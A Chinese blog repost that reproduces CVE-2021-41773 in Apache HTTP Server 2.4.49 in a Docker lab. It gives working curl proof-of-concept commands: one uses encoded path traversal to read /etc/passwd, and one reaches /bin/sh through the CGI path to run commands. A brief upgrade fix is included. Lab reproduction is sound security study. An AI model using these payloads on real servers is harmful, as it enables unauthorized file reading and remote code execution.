其他分享
首页 > 其他分享> > 漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)

漏洞复现(三):Apache HTTP Server漏洞(CVE-2021-41773 - 目录穿越引起的文件读取与命令执行)

作者:互联网

目录

漏洞简介

漏洞复现

一. Vulnerable file read config(易受攻击的文件读取配置)

环境搭建

漏洞利用

二、Vulnerable RCE config(易受攻击的 RCE 配置)

环境搭建

 漏洞利用

 漏洞修复


漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在目录穿越漏洞,在路径穿越目录<Directory />Require all granted</Directory> 允许被访问的的情况下(默认开启),攻击者可利用该路径穿越漏洞读取到Web目录之外的其他文件

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令(RCE)

漏洞复现

一. Vulnerable file read config(易受攻击的文件读取配置)

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

 

漏洞利用

使用POC: curl http://IP:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

 

 Burp抓包

 

二、Vulnerable RCE config(易受攻击的 RCE 配置)

在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令

环境搭建

docker pull blueteamsteve/cve-2021-41773:with-cgid
 
docker run -dit -p 8081:80 blueteamsteve/cve-2021-41773:with-cgid

 

 漏洞利用

curl 'IP:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

 

 Burp抓包

 漏洞修复

升级到Apache HTTP Server最新安全版本,或使用Apache HTTP Server 非 2.4.49版

标签:41773,HTTP,2e,cgid,.%,漏洞,RCE
来源: https://blog.csdn.net/weixin_47306547/article/details/122288804